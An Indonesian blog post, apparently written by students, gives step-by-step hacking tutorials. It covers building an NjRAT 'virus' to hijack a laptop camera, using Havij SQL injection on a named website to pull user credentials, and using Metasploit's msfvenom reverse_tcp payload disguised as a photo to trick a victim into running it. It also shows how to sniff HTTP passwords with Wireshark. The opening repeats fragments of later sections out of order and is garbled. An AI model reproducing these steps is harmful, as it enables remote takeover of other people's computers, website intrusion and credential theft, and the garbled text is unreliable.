Assalamualaikum
1. NjRAT
Nah itu tadi sedikit pembahasan tentang hacking menggunakan aplikasi NjRAT. Tutorial NjRAT di atas hanya mencoba hack kamera laptop saja, selebihnya kalian coba sendiri dirumah.
2. Havij
Kemudian beri centang pada kolom username dan password. Username dan password akan muncul. Namun password dalam kondisi ter-enkripsi. Jadi, kalian perlu mendesripsikannya terlebih dahulu menggunakan deskriptor.
3. Metasploit
Metasploit adalah sebuah proyek keamanan komputer yang menyediakan informasi tentang kerentanan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan signature IDS.
maka akan muncul gambar seperti dibawah ini.
Keterangan :
Lanjut dengan menyiapkan foto yang semenarik mungkin agar orang yang melihat file tersebut penasaran untuk membukanya. Contohnya foto personil sistar dibawah ini.
Masuk ke dalam website , untuk mengkonvert ( mengubah ) gambar yg jpg tadi menjadi icon . disini saya masuk kedalam website icoconvert.
Settingan nya cocokkan seperti gambar dibawah ini. Kemudian klik "Convert ICO".
Setelah iconnya nya sudah selesai di unduh, selanjutnya beralih ke file.exe dan file .jpg tadi. Select lalu klik kanan pilih add to archive.
Sesuaikan dengan settingan di bawah yaaaa.
Setelah disetting semua, klik ok maka file telah jadi. Seperti gambar di bawah.
Selanjutnya , masuk lagi kedalam terminal kalilinux , ketikan perintah : "Msfconsole" tanda tanda petik.
kemudian ikuti script dibawah ini.
Setelah perintah show options maka tekan Enter maka akan muncul seperti gambar dibawah.
Ketik "exploit" tanpa tanda petik pada terminal, tunggu beberapa saat jika prosesnya lama ketikkan
4. Wireshark
Wireshark merupakan salah satu tools atau aplikasi “Network Analyzer” atau Penganalisa Jaringan. Penganalisaan Kinerja Jaringan itu dapat melingkupi berbagai hal, mulai dari proses menangkap paket-paket data atau informasi yang berlalu-lalang dalam jaringan, sampai pada digunakan pula untuk sniffing (memperoleh informasi penting seperti password email, dll). Wireshark sendiri merupakan free tools untuk Network Analyzer yang ada saat ini. Dan tampilan dari wireshark ini sendiri terbilang sangat bersahabat dengan user karena menggunakan tampilan grafis atau GUI (Graphical User Interface).
Kegunaan wireshark adalah:
Menganalisa Jaringan
Menangkap paket data, atau informasi yang berkeliaran dalam jaringan yang terlihat.
Memperoleh informasi penting, seperti password, dll.
Membaca data secara langsung dari Ethernet, Token-Ring, FDDI, serial (PPP dan SLIP), 802.11 wireless LAN, dan koneksi ATM
Dapat mengetahui IP seseorang melalui typingan room.
Menganalisa transmisi paket data dalam jaringan, proses koneksi, dan transimi data antar computer, dll.
Disini kami memberikan tutorial melakukan sniffing dengan menggunakan wireshark. Sniffing adalah pekerjaan menyadap data-data yang berlalu-lalang di jaringan.Paket data yang di sadap bisa mengenai apa saja, baik itu username,password,apa yang dilakukan pengguna melalui jaringan,sampai mengidentifikasi komputer yang terhubung dalam jaringan.Sniffing juga bisa di gunakan untuk mengetahui apa yang membuat komputer menjadi lambat.
Pertama, kalian harus download dan install aplikasi wireshark di laptop kalian, Setelah itu buka aplikasi wireshark, kemudian klik "capture" dan pilih "option".
Maka akan di alihkan pada halaman capture interface, di situ akan ada pilihan jaringan mana yang ingin kalian analisis, lalu klik start
Ini adalah tampilan paket data yang ada pada wifi sasaran kami.
Selanjutnya login di salah satu website.
Setelah login, coba cek paket data di wireshark. Filter dangan keyword http.
Setelah muncul, klik kanan, Follow/TCP Stream.
Maka akan terlihat email serta password yang tadi saya login(bisa di lihat pada ss)
Nah itu tadi beberapa ilmu yang kami dapat dan kami share ke kalian. semoga bermanfaat ya. Ingat ya kawan, melakukan hacking itu bukanlah hal sembarangan. So, berhati-hatilah jika ingin melakukan hacking.
"Jikalau anda tidak ingin menjadi hacker, maka amankanlah device anda dari gangguan hacker". bye
Assalamualaikum
Hai para pembaca, maaf ya mimin baru bisa update artikel baru karena mimin lagi sibuk mencari jati diri di dunia ini wkwkkk. Kali ini mimin akan berbagi ilmu tentang hack. kalian tau gak hack itu apa? Nah, kalo gak tau langsung aja kita bahas. Cekidot.
Hacking adalah usaha atau cara untuk menerobos sistem komputer guna mengumpulkan informasi, menolak akses, menghapus file, atau mengacaukan sistem komputer.
kali ini kita akan membahas seputar sistem keamanan komputer. Materi ini kami dapatkan dari mata kuliah Sistem Keamanan Komputer di kampus kami tercinta. Jadi, kami ingin sharing beberapa ilmu yang kami dapatkan tersebut agar kalian dapat ilmu baru. Pokoknya kalian harus coba dirumah.
NjRAT adalah salah satu tools hacking untuk OS windows yang digunakan untuk meremote pc satu dengan pc lain. RAT adalah singkatan dari Remote Administrator Tool yang di gunakan untuk menghubungkan dan mengatur satu atau lebih komputer dengan berbagai kemampuan seperti:
- Screen/camera capture atau control
- File management (download/upload/execute/dll.)
- Shell control (CMD control)
- Computer control (power off/on/log off)
- Registry management (query/add/delete/modify)
- Password management
Nah sebelum kalian melakukan hacking menggunakan NjRAT, pastikan semua antivirus yang terinstall dilaptop atau PC kalian dalam kondisi non-aktif, kemudian install aplikasi NjRAT nya. Kalau sudah, buka aplikasi NjRAT lalu atur port menjadi 2004 kemudian klik "Start".
Setelah kalian meng-klik "Start"maka akan muncul tampilan seperti dibawah ini.
Klik perintah “Builder” yang ada pada sisi kiri bawah aplikasi tersebut. Lalu atur host nya sesuai dengan ip jaringan kalian. Lalu klik “Build”
Simpan file virus yang telah kalian buat tadi sesuai dengan nama yang kalian inginkan. di sini kami menggunakan nama "Server" untuk file tersebut. Kemudian klik "save".
Setelah file disimpan maka akan muncul tampilan seperti gambar dibawah ini lalu klik “OK”.
Lalu copy file virus yang sudah dibuat ke laptop yang ingin dihack lalu jalankan virus tersebut. Setelah file virus dijalankan maka file laptop yang ingin di hack tadi akan terlihat dilaptop kalian.
Kemudian klik kanan pada file laptop yg ingin dihack kemudian pilih “Remote Cam” untuk melihat kamera pada laptop yang ingin di hack.
Jika kamera laptop lain sudah menyala maka anda sudah berhasil.
Nah itu tadi sedikit pembahasan tentang hacking menggunakan aplikasi NjRAT. Tutorial NjRAT di atas hanya mencoba hack kamera laptop saja, selebihnya kalian coba sendiri dirumah.
2. Havij
Havij adalah aplikasi untuk mendeface Website. Havij dibuat untuk mempermudah mencari bug/celah pada suatu website. Tools ini banyak digunakan oleh Attacker Newbie maupun Expert karena cukup mudah dan tanpa harus melakukan selection kode .
Perlu diketahui juga bahwa SQL Injection adalah tehnik meretas Website dengan menggunakan celah Query/String pada suatu Website Dan tingkat kerusakan biasanya sangat tinggi karena para Attacker dapat mengetahi bahkan merubah isi dari DB (DataBase ) suatu Website yang menjadi korban mereka.
langkah awal untuk melakukan hacking dengan menggunakan aplikasi havij adalah kalian harus mencari website yang ingin di hack. disini kami akan meng-hack website freescience.com. Kemdian buka aplikasi havij. Tampilan awal havij seperti dibawah ini.
Isi kolom target dengan alamat website yang ingin di hack.
Klik icon "table" maka akan muncul tampilan seperti dibawah ini.
Kemudian beri centang pada kolom "users" dan klik "Get columns".
Kemudian beri centang pada kolom username dan password. Username dan password akan muncul. Namun password dalam kondisi ter-enkripsi. Jadi, kalian perlu mendesripsikannya terlebih dahulu menggunakan deskriptor.
3. Metasploit
Metasploit adalah sebuah proyek keamanan komputer yang menyediakan informasi tentang kerentanan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan signature IDS.
Metasploit dibuat oleh H. D. Moore pada tahun 2003 sebagai alat jaringan portabel menggunakan Perl. Pada tahun 2007, Framework Metasploit telah benar-benar ditulis ulang di Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan bahwa telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi manajemen kerentanan terpadu.
Metasploit dapat digunakan untuk menguji kerentanan sistem komputer atau untuk masuk ke sistem remote. Seperti banyak alat-alat keamanan informasi, Metasploit dapat digunakan untuk kegiatan yang sah dan tidak sah. Sejak akuisisi Metasploit Framework, Rapid7 telah menambahkan dua edisi eksklusif inti terbuka yang disebut Metasploit Express dan Metasploit Pro.
Oke langsung saja ke pembhasan. Siapkan sistem operasi kali linux. Kalau kalian menggunakan sistem operasi windows, kalian bisa instal sistem operasi kali linux dengan menggunakan virtual machine atau dengan dualboot (sistem operasi ganda). Masuk ke linux dan bukalah terminal, kemudian ketikkan :
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.1 LPORT=4444 -f > videoxxx.exe
maka akan muncul gambar seperti dibawah ini.
Keterangan :
- LHOST = IP HOST anda.
- LPORT = Disaranakan menggunakan 4444.
Kemudian cek di file > home , maka disana kita dapat lihat file videoxxx.exe yg telah di buat.
Lanjut dengan menyiapkan foto yang semenarik mungkin agar orang yang melihat file tersebut penasaran untuk membukanya. Contohnya foto personil sistar dibawah ini.
Masuk ke dalam website , untuk mengkonvert ( mengubah ) gambar yg jpg tadi menjadi icon . disini saya masuk kedalam website icoconvert.
Settingan nya cocokkan seperti gambar dibawah ini. Kemudian klik "Convert ICO".
Setelah iconnya nya sudah selesai di unduh, selanjutnya beralih ke file.exe dan file .jpg tadi. Select lalu klik kanan pilih add to archive.
Sesuaikan dengan settingan di bawah yaaaa.
Setelah disetting semua, klik ok maka file telah jadi. Seperti gambar di bawah.
Selanjutnya , masuk lagi kedalam terminal kalilinux , ketikan perintah : "Msfconsole" tanda tanda petik.
kemudian ikuti script dibawah ini.
Setelah perintah show options maka tekan Enter maka akan muncul seperti gambar dibawah.
Ketik "exploit" tanpa tanda petik pada terminal, tunggu beberapa saat jika prosesnya lama ketikkan
- Sessions –v
- Sessions –i 1
Maka akan muncul seperti gambar dibawah. Selanjutnya ketik sysinfo lalu Enter. Jika muncul seperti gambar dibawah maka target telah mengklik icon yang telah di buat.
Wireshark merupakan salah satu tools atau aplikasi “Network Analyzer” atau Penganalisa Jaringan. Penganalisaan Kinerja Jaringan itu dapat melingkupi berbagai hal, mulai dari proses menangkap paket-paket data atau informasi yang berlalu-lalang dalam jaringan, sampai pada digunakan pula untuk sniffing (memperoleh informasi penting seperti password email, dll). Wireshark sendiri merupakan free tools untuk Network Analyzer yang ada saat ini. Dan tampilan dari wireshark ini sendiri terbilang sangat bersahabat dengan user karena menggunakan tampilan grafis atau GUI (Graphical User Interface).
Kegunaan wireshark adalah:
Disini kami memberikan tutorial melakukan sniffing dengan menggunakan wireshark. Sniffing adalah pekerjaan menyadap data-data yang berlalu-lalang di jaringan.Paket data yang di sadap bisa mengenai apa saja, baik itu username,password,apa yang dilakukan pengguna melalui jaringan,sampai mengidentifikasi komputer yang terhubung dalam jaringan.Sniffing juga bisa di gunakan untuk mengetahui apa yang membuat komputer menjadi lambat.
Pertama, kalian harus download dan install aplikasi wireshark di laptop kalian, Setelah itu buka aplikasi wireshark, kemudian klik "capture" dan pilih "option".
Maka akan di alihkan pada halaman capture interface, di situ akan ada pilihan jaringan mana yang ingin kalian analisis, lalu klik start
Ini adalah tampilan paket data yang ada pada wifi sasaran kami.
Selanjutnya login di salah satu website.
Setelah login, coba cek paket data di wireshark. Filter dangan keyword http.
Setelah muncul, klik kanan, Follow/TCP Stream.
Maka akan terlihat email serta password yang tadi saya login(bisa di lihat pada ss)
Nah itu tadi beberapa ilmu yang kami dapat dan kami share ke kalian. semoga bermanfaat ya. Ingat ya kawan, melakukan hacking itu bukanlah hal sembarangan. So, berhati-hatilah jika ingin melakukan hacking.
"Jikalau anda tidak ingin menjadi hacker, maka amankanlah device anda dari gangguan hacker". bye
Assalamualaikum
Tidak ada komentar:
Posting Komentar